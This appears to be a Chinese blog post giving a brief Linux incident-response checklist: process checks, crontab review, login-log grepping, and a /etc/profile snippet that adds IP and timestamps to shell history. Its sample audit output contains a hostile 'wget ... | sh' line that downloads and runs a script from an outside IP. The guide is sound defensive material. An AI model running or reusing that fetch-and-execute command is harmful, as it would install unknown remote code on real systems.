linux应急响应
Linux应急响应
一、识别现象
1 | top #检查占用率高的可疑进程(>70%) |
有时安全网关检测到的不全是恶意IP,还有可能是个域名,这种情况下,域名对应的IP是变化的,我们不能直接用上述方法进行监控
我们可以先在host文件中添加一条规则,将恶意域名重定向到一个随机的IP地址,然后对其进行监控。
二、清除病毒
1 | ps -elf | grep [pid] |
三、闭环兜底
检查是否存在可疑定时任务
1 | crontab-l #枚举定时任务 |
四、检查修复
1 | grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'#查询log主机登陆日志 |
添加命令审计
为历史的命令增加登录的IP地址、执行命令时间等信息:
[1]保存1万条命令:
1 | sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile |
[2]在/etc/profile的文件尾部添加如下行数配置信息:
1 | USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`if [ "$USER_IP" = "" ]thenUSER_IP=`hostname`fi export HISTTIMEFORMAT="%F %T $USER_IP `whoami` " shopt -s histappend export PROMPT_COMMAND="history -a" |
[3]让配置生效:
1 | source /etc/profile |
生成效果:
1 | 762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-http://103.219.112.66:8000/i.sh) | sh |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dyinglight's blog!